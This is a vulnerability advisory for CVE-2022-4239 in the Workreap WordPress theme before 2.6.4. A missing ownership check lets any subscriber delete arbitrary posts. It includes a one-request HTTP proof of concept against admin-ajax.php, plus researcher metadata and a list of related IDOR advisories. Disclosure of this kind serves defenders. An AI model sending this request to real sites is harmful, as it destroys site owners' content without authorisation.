Workreap < 2.6.4 – Subscriber+ Arbitrary Posts Deletion via IDOR | CVE 2022-4239 | Theme Vulnerabilities

Description

The theme does not verify that an addon service belongs to the user issuing the request, or indeed that it is an addon service, when processing the workreap_addons_service_remove action, allowing any user to delete any post by knowing or guessing the id.

Proof of Concept

POST /testt/wp-admin/admin-ajax.php HTTP/2
Host: host
Cookie: [Subscriber+]
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Content-Length: 65

action=workreap_addons_service_remove&id=6191&security=295c6a26b2

Affects Themes

Fixed in 2.6.4

References

CVE

Classification

Type

IDOR

OWASP top 10

A5: Broken Access Control

CWE

CVSS

Miscellaneous

Original Researcher

Veshraj Ghimire

Submitter

Veshraj Ghimire

Submitter website

https://veshrajghimire.com.np

Submitter twitter

Verified

Yes

WPVDB ID

1c163987-fb53-43f7-bbff-1c2d8c0d694c

Timeline

Publicly Published

2022-12-02 (about 3 years ago)

Added

2022-12-02 (about 3 years ago)

Last Updated

2022-12-02 (about 3 years ago)

Other

Published

Title

Published

2024-04-17

Title

EAN for WooCommerce < 4.9.3 - Insecure Direct Object Reference to Sensitve Information Exposure via Shortcode

Published

2022-04-14

Title

WP 2FA < 2.2.0 - Arbitrary 2FA Disabling via IDOR

Published

2025-03-06

Title

SupportCandy < 3.3.1 - Support Ticket Attachments Download via IDOR

Published

2024-07-18

Title

GiveWP – Donation Plugin and Fundraising Platform < 3.14.0 - Insecure Direct Object Reference to Authenticated (GiveWP Worker+) Arbitrary Post Actions

Published

2025-03-13

Title

WP JobHunt <= 7.1 - Unauthenticated Privilege Escalation via Email Update/Account Takeover